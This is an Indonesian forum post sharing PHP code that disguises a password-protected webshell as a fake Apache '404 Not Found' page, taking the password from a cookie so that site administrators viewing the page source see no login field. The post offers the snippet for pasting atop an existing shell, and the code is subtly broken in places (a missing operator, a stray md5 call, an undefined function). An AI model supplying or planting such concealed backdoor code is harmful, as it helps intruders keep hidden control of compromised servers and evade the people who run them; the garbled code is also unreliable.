[dharaninja]

Numpang share ya bro :v Saya perhatikan kalau webshell berpassword yang umum, biasanya tampilannya 404 not found tapi kalau diraba2 gitu ada colom buat ngisi password :v Kalau seandainya adminnya liat viewource keliatan deh kolomnya :v

Tapi, disini authentikasinya saya robah lagi jadi pake cookie bro. Ini screenshootnya


Oke, dari hasil diatas kalau di view source gak ada column tuh :v Untuk masukin passwordnya kita perlu add on yang namanya cookies manager



Setelah itu save baru muncul webshellnya :v



Dan ini kode PHP nya, ditaruh dicode shell yang atas aja bro

PHP Code:

$s_show = ""; md5(password)

if(!isset($_COOKIE['show'])) {
setcookie("show","null",time() 3600);
}

if(kript($_COOKIE['show']) == $s_show) {
setcookie("show",md5($_SERVER['HTTP_USER_AGENT'].md5($_COOKIE['show']).$_SERVER['SCRIPT_NAME']),time() + 3600);
} else {
if($_COOKIE['show'] != md5($_SERVER['HTTP_USER_AGENT'].$s_show.$_SERVER['SCRIPT_NAME'])) {
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php echo $_SERVER['SCRIPT_NAME'];?> was not found on this server.</p> <hr> <address><?php echo $_SERVER['SERVER_SOFTWARE'];?> Server at <?php echo $_SERVER['HTTP_HOST']; ?> Port <?php echo $_SERVER['SERVER_PORT'];?></address> </body></html>
<?php
exit;
}} 


Mungkin buat agan2 yang udah bisa pemrograman PHP ini mungkin sudah biasa, tapi gak ada salahnya kalau ane share :v Jangan lupa cendol ya bro :v